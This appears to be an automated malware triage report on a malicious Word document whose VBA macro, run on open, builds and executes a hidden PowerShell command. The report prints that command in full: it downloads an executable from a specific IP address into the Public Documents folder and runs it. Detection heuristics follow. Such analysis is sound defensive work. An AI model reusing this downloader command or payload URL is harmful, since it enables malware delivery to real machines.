Malware Insights
The sample is a malicious Word document containing a VBA macro that executes upon opening. The macro reconstructs the command 'powershell -w hidden -Sle 31;Start-BitsTransfer -Source http://52.58.97.51/T67/F2/Product_Specifications_Details_723312_RFQ.exe -Destination C:\Users\Public\Documents\conditionhair.exe;C:\Users\Public\Documents\conditionhair.exe' and writes it to 'C:\Users\Public\Documents\behaviorstart.cmd'. It then executes this command file using 'shell.application', which downloads a second-stage executable from the specified URL to 'C:\Users\Public\Documents\conditionhair.exe' and subsequently executes it.
Heuristics 6
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main
